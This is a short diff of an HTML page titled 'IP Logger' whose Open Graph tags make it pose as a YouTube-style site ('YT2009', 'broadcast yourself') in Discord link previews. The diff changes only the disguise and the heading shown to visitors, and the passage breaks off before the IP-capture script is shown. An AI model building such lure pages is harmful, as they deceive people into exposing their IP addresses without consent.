--- a/index.html
+++ b/index.html
@@ -6,13 +6,13 @@
     <title>IP Logger</title>
 
     <!-- Open Graph meta tags for Discord embeds -->
-    <meta property="og:title" content="YT2009r">
+    <meta property="og:title" content="YT2009">
     <meta property="og:description" content="broadcast yourself">
 </head>
 <body>
 
-<h1>IP Logged lil bro</h1>
-<p>Your IP address: <span id="userIP"></span></p>
+<h1>whoops</h1>
+<p>Your IP: <span id="userIP"></span></p>
 
 <script>
     // Function to get user's IP address
